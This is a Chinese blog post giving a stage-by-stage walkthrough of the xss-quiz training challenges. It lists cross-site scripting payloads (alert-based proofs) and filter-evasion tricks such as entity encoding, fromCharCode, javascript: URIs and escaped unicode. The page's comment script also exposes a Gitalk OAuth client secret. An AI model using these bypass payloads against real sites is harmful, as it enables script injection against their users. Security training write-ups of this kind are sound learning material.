<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>用肝刷xss-quiz | osword&#39;s blog | 小刀</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="XSS">
    <meta name="description" content="前言刷刷xss, have fun… 项目地址：http:&#x2F;&#x2F;xss-quiz.int21h.jp Stage 11&lt;img src&#x3D;&#39;1&#39; onerror&#x3D;&quot;alert(document.domain)&quot; &#x2F;&gt;">
<meta property="og:type" content="article">
<meta property="og:title" content="用肝刷xss-quiz">
<meta property="og:url" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/index.html">
<meta property="og:site_name" content="osword&#39;s blog">
<meta property="og:description" content="前言刷刷xss, have fun… 项目地址：http:&#x2F;&#x2F;xss-quiz.int21h.jp Stage 11&lt;img src&#x3D;&#39;1&#39; onerror&#x3D;&quot;alert(document.domain)&quot; &#x2F;&gt;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574162948791.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574163078341.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574163887664.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574164588585.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574164982695.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574165349853.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574166232566.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574166457022.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574166553095.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574169016656.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574169121713.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574169554612.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574171624594.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574172129542.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574172804310.png">
<meta property="og:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574173073762.png">
<meta property="article:published_time" content="2019-11-19T14:30:21.000Z">
<meta property="article:modified_time" content="2020-05-15T08:21:46.000Z">
<meta property="article:author" content="osword">
<meta property="article:tag" content="XSS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/1574162948791.png">
    
        <link rel="alternate" type="application/atom+xml" title="osword&#39;s blog" href="/atom.xml">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<meta name="generator" content="Hexo 4.2.1"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">osword</h5>
          <a href="mailto:929337105@qq.com" title="929337105@qq.com" class="mail">929337105@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://zhzhdoai.github.io/"  >
                <i class="icon icon-lg icon-友链"></i>
                友链
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://glotozz.github.io/" target="_blank" rel="noopener"  >
                <i class="icon icon-lg icon-glotozz"></i>
                Glotozz
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://nikoeurus.github.io/" target="_blank" rel="noopener"  >
                <i class="icon icon-lg icon-sommus"></i>
                Sommus
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://mochazz.github.io/" target="_blank" rel="noopener"  >
                <i class="icon icon-lg icon-mochazz@七月火"></i>
                Mochazz 七月火
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://tea9.xyz/" target="_blank" rel="noopener"  >
                <i class="icon icon-lg icon-tea9"></i>
                Tea 9
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://wulidecade.cn/" target="_blank" rel="noopener"  >
                <i class="icon icon-lg icon-Decade"></i>
                Decade
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">用肝刷xss-quiz</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="输入感兴趣的关键字">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">用肝刷xss-quiz</h1>
        <h5 class="subtitle">
            
                <time datetime="2019-11-19T14:30:21.000Z" itemprop="datePublished" class="page-time">
  2019-11-19
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#前言"><span class="post-toc-number">1.</span> <span class="post-toc-text">前言</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-1"><span class="post-toc-number">2.</span> <span class="post-toc-text">Stage 1</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-2"><span class="post-toc-number">3.</span> <span class="post-toc-text">Stage 2</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-3"><span class="post-toc-number">4.</span> <span class="post-toc-text">Stage 3</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-4"><span class="post-toc-number">5.</span> <span class="post-toc-text">Stage 4</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-5"><span class="post-toc-number">6.</span> <span class="post-toc-text">Stage 5</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Satage-6"><span class="post-toc-number">7.</span> <span class="post-toc-text">Satage 6</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-7"><span class="post-toc-number">8.</span> <span class="post-toc-text">Stage 7</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-8"><span class="post-toc-number">9.</span> <span class="post-toc-text">Stage 8</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-9"><span class="post-toc-number">10.</span> <span class="post-toc-text">Stage 9</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-10"><span class="post-toc-number">11.</span> <span class="post-toc-text">Stage 10</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-11"><span class="post-toc-number">12.</span> <span class="post-toc-text">Stage 11</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-12"><span class="post-toc-number">13.</span> <span class="post-toc-text">Stage 12</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Stage-15"><span class="post-toc-number">14.</span> <span class="post-toc-text">Stage 15</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#总结"><span class="post-toc-number">15.</span> <span class="post-toc-text">总结</span></a></li></ol>
        </nav>
    </aside>


<article id="post-用肝刷xss-quiz"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">用肝刷xss-quiz</h1>
        <div class="post-meta">
            <time class="post-time" title="2019-11-19 22:30:21" datetime="2019-11-19T14:30:21.000Z"  itemprop="datePublished">2019-11-19</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>刷刷xss, have fun…</p>
<p>项目地址：<a href="http://xss-quiz.int21h.jp" target="_blank" rel="noopener">http://xss-quiz.int21h.jp</a></p>
<h1 id="Stage-1"><a href="#Stage-1" class="headerlink" title="Stage 1"></a>Stage 1</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;&#39;1&#39; onerror&#x3D;&quot;alert(document.domain)&quot; &#x2F;&gt;</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574162948791.png" alt="1574162948791" title="">
                </div>
                <div class="image-caption">1574162948791</div>
            </figure>

<h1 id="Stage-2"><a href="#Stage-2" class="headerlink" title="Stage 2"></a>Stage 2</h1><p><code>&lt;img src=&quot;&quot; onerror=&quot;alert(document.domain)&quot;/&gt;</code> 被放置在value中直接闭合即可</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"&gt;&lt;img src='' onerror="</span>alert(<span class="built_in">document</span>.domain)<span class="string">" /&gt;&lt;id="</span><span class="number">1</span></span><br><span class="line"><span class="string">"&gt;&lt;img src='' onerror="</span>alert(<span class="built_in">document</span>.domain)<span class="string">" /&gt;//</span></span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574163078341.png" alt="1574163078341" title="">
                </div>
                <div class="image-caption">1574163078341</div>
            </figure>



<h1 id="Stage-3"><a href="#Stage-3" class="headerlink" title="Stage 3"></a>Stage 3</h1><p>输入123显示在b标签中</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574163887664.png" alt="1574163887664" title="">
                </div>
                <div class="image-caption">1574163887664</div>
            </figure>

<p>尝试闭合b标签</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">123</span><span class="string">"&lt;/b&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;//</span></span><br></pre></td></tr></table></figure>

<p><code>&lt;</code>，<code>&#39;</code>1被实体编码</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574164588585.png" alt="1574164588585" title="">
                </div>
                <div class="image-caption">1574164588585</div>
            </figure>

<p>国家选择处，没有进行html实体编码,</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574164982695.png" alt="1574164982695" title="">
                </div>
                <div class="image-caption">1574164982695</div>
            </figure>



<h1 id="Stage-4"><a href="#Stage-4" class="headerlink" title="Stage 4"></a>Stage 4</h1><p>交互发送了三个参数，p1,p2都实体编码了</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574165349853.png" alt="1574165349853" title="">
                </div>
                <div class="image-caption">1574165349853</div>
            </figure>

<p>找p3进行利用</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;id="</span></span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574166232566.png" alt="1574166232566" title="">
                </div>
                <div class="image-caption">1574166232566</div>
            </figure>

<h1 id="Stage-5"><a href="#Stage-5" class="headerlink" title="Stage 5"></a>Stage 5</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;script&gt;alert(document.domain)&lt;&#x2F;script&gt;&lt;id&#x3D;&quot;</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574166457022.png" alt="1574166457022" title="">
                </div>
                <div class="image-caption">1574166457022</div>
            </figure>



<h1 id="Satage-6"><a href="#Satage-6" class="headerlink" title="Satage 6"></a>Satage 6</h1><p><code>&lt;</code>被实体编码</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574166553095.png" alt="1574166553095" title="">
                </div>
                <div class="image-caption">1574166553095</div>
            </figure>

<p>想着编码绕过，但是<code>\</code>被吃掉</p>
<p>考点是input中事件执行xss,得需要考虑自动触发，要不做出来也没打意义，如下payload能够自动触发xss</p>
<p>参考链接：<a href="http://suroot.cn/106.html" target="_blank" rel="noopener">http://suroot.cn/106.html</a></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">" autofocus onfocus="</span>alert(<span class="built_in">document</span>.domain)</span><br></pre></td></tr></table></figure>

<p>再提几个需要条件触发xss</p>
<p>参考链接：<a href="https://hpdoger.cn/2018/08/02/xss%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%EF%BC%88%E4%BA%8C%EF%BC%89%E4%B9%8B%E6%80%92%E5%88%B7xss-quiz/#challenge3-%E5%85%B6%E5%AE%83input%E6%A1%86%E7%9A%84xss" target="_blank" rel="noopener">https://hpdoger.cn/2018/08/02/xss%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%EF%BC%88%E4%BA%8C%EF%BC%89%E4%B9%8B%E6%80%92%E5%88%B7xss-quiz/#challenge3-%E5%85%B6%E5%AE%83input%E6%A1%86%E7%9A%84xss</a></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">鼠标向上移动触发js事件：<span class="string">"onmouseover="</span>alert(<span class="built_in">document</span>.domain)<span class="string">",onmouseover要脱离引号，alert在引号内。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">鼠标点击触发js事件："</span>onclick=<span class="string">"alert(document.domain)"</span></span><br><span class="line"></span><br><span class="line">事件会在页面或图像加载完成后立即发生:onload=<span class="string">"alert(document.domain)"</span></span><br></pre></td></tr></table></figure>

<h1 id="Stage-7"><a href="#Stage-7" class="headerlink" title="Stage 7"></a>Stage 7</h1><p>过滤：<code>&lt;</code>,<code>&gt;</code>,<code>\</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">添加：　空格＋符号&#x3D;&gt;符号&#x3D;&quot;&quot;</span><br><span class="line">	   符号&#x3D;123 &#x3D;&gt;符号&#x3D;&quot;123&quot;</span><br></pre></td></tr></table></figure>

<p>不能用单引号去闭合，这里自动触发xss行不通，只能靠特定条件触发xss</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">123 onclick&#x3D;alert(document.domain)</span><br></pre></td></tr></table></figure>



<h1 id="Stage-8"><a href="#Stage-8" class="headerlink" title="Stage 8"></a>Stage 8</h1><p>考察javascript伪协议</p>
<p>payload</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(<span class="built_in">document</span>.domain)</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574169016656.png" alt="1574169016656" title="">
                </div>
                <div class="image-caption">1574169016656</div>
            </figure>

<h1 id="Stage-9"><a href="#Stage-9" class="headerlink" title="Stage 9"></a>Stage 9</h1><p>交换过程中发送编码形式</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574169121713.png" alt="1574169121713" title="">
                </div>
                <div class="image-caption">1574169121713</div>
            </figure>

<p>利用utf-7编码</p>
<p>参考链接：<a href="https://sakurasec.com/utf-7-xss/" target="_blank" rel="noopener">https://sakurasec.com/utf-7-xss/</a></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574169554612.png" alt="1574169554612" title="">
                </div>
                <div class="image-caption">1574169554612</div>
            </figure>

<p>但是现在浏览器不支持utf-7，跳过该题目</p>
<h1 id="Stage-10"><a href="#Stage-10" class="headerlink" title="Stage 10"></a>Stage 10</h1><p>过滤了domain关键字，使用html实体编码绕过</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"&gt;&lt;img src='' onerror="</span>alert(<span class="built_in">document</span>.domdomainain)<span class="string">" /&gt;&lt;id="</span></span><br><span class="line"></span><br><span class="line">"&gt;&lt;img src='' onerror="alert(document.&amp;#100;&amp;#111;&amp;#109;&amp;#97;&amp;#105;&amp;#110;)" /&gt;&lt;id="</span><br><span class="line">                             </span><br><span class="line"><span class="string">"&gt;&lt;img src='' onerror=eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41)) /&gt;&lt;id="</span></span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574171624594.png" alt="1574171624594" title="">
                </div>
                <div class="image-caption">1574171624594</div>
            </figure>

<h1 id="Stage-11"><a href="#Stage-11" class="headerlink" title="Stage 11"></a>Stage 11</h1><p>过滤替换</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"s/script/xscript/ig;"</span> and <span class="string">"s/on[a-z]+=/onxxx=/ig;"</span> and <span class="string">"s/style=/stxxx=/ig;"</span></span><br></pre></td></tr></table></figure>

<p>这里考虑使用html编码构造事件，但是浏览器在解析DOM树是不对html编码进行解码．只能考虑在属性中利用</p>
<p>利用javascript伪协议,在属性中进行编码，浏览器在解析完成dom树之后，执行js代码，会进行编码转换</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;a href&#x3D;&quot;java&amp;#115;&amp;#99;&amp;#114;ipt:alert(document.domain)&quot;&gt;&lt;id&#x3D;&quot;</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574172129542.png" alt="1574172129542" title="">
                </div>
                <div class="image-caption">1574172129542</div>
            </figure>

<h1 id="Stage-12"><a href="#Stage-12" class="headerlink" title="Stage 12"></a>Stage 12</h1><p>过滤</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"s/[\x00-\x20\&lt;\&gt;\"\']//g;"</span></span><br></pre></td></tr></table></figure>

<p>过滤双引号，必须构造双引号闭合标签,利用html实体编码，浏览器解码后会认为该双引号为字符型，无法逃逸.</p>
<p> 但更恶心是<code>&lt;</code>被过滤，其他wp都是基于iE浏览器意义不大．</p>
<p>13-14关也是针对IE浏览器，跳过</p>
<h1 id="Stage-15"><a href="#Stage-15" class="headerlink" title="Stage 15"></a>Stage 15</h1><p>输出内容是经过<code>document.write(&quot;内容&quot;)</code>输出到value中，</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574172804310.png" alt="1574172804310" title="">
                </div>
                <div class="image-caption">1574172804310</div>
            </figure>

<p>直接构造标签输出到value,<code>&lt;,&quot;</code>会被转义,</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="./1574173073762.png" alt="1574173073762" title="">
                </div>
                <div class="image-caption">1574173073762</div>
            </figure>

<p>既然是在js中执行，考虑unicode绕过,后端php会执行stripslashes过滤<code>\</code>双写即可绕过</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">\\u003cscript\\u003ealert(<span class="built_in">document</span>.domain);\\u003c/script\\u003e</span><br><span class="line">\\x3cscript\\x3ealert(<span class="built_in">document</span>.domain);\\x3c/script\\x3e</span><br></pre></td></tr></table></figure>

<p>​    </p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><ol>
<li>考虑送至后端的参数，可能存在你在浏览器不能输入，但是可控，抓包查看．</li>
<li>考虑浏览器解析html先后顺序，利用该差异，应用不同的编码绕过</li>
<li>一般情况下<code>&lt;,&gt;,\,&quot;</code> 就x不起来了</li>
<li>开f12做题有惊喜</li>
<li>关注meta属性</li>
</ol>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    最后更新时间：<time datetime="2020-05-15T08:21:46.000Z" itemprop="dateUpdated">2020-05-15 16:21:46</time>
</span><br>


        
        玩的开心
        
    </div>
    
    <footer>
        <a href="http://zhzhdoai.github.io">
            <img src="/img/avatar.jpg" alt="osword">
            osword
        </a>
    </footer>
</blockquote>

        


        <div class="post-footer">
            
	<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/XSS/" rel="tag">XSS</a></li></ul>


            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/&title=《用肝刷xss-quiz》 — osword's blog&pic=http://zhzhdoai.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/&title=《用肝刷xss-quiz》 — osword's blog&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《用肝刷xss-quiz》 — osword's blog&url=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/&via=http://zhzhdoai.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2019/11/21/2019-%E9%AB%98%E6%A0%A1%E7%BD%91%E7%BB%9C%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E8%BF%90%E7%BB%B4%E6%8C%91%E6%88%98%E8%B5%9Bweb%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">2019 高校网络信息安全管理运维挑战赛web部分题解</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2019/11/16/%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8BThinkCMFX-%E4%B8%80/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">历史漏洞分析之ThinkCMFX(一)</h4>
      </a>
    </div>
  
</nav>



    

















<section class="comments" id="comments">
    <div id="gitalk-container"></div>
    <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
    <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
    <script src="/js/md5.min.js"></script>
    <script>
        var gitalk = new Gitalk({
            clientID: '7d7576c71632f14d639a',
            clientSecret: '3d7f7e4c0e9a43a2cc5334d68aee612090df8b70',
            repo: 'zhzhdoai.github.io',
            owner: 'zhzhdoai',
            admin: 'zhzhdoai',
            id: md5(location.pathname),
            perPage: 50,
            distractionFreeMode: 'false'
        })

        gitalk.render('gitalk-container')
    </script>
</section>



</article>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
                <span><a href="/atom.xml" target="_blank" class="rss" title="rss"><i class="icon icon-lg icon-rss"></i></a></span>
            
            <span>博客内容遵循 <a rel="license noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享 署名 - 非商业性 - 相同方式共享 4.0 国际协议</a></span>
        </p>
    </div>
    <div class="bottom">
        <p><span>osword &copy; 2015 - 2020</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/&title=《用肝刷xss-quiz》 — osword's blog&pic=http://zhzhdoai.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/&title=《用肝刷xss-quiz》 — osword's blog&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://zhzhdoai.github.io/2019/11/19/%E7%94%A8%E8%82%9D%E5%88%B7xss-quiz/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
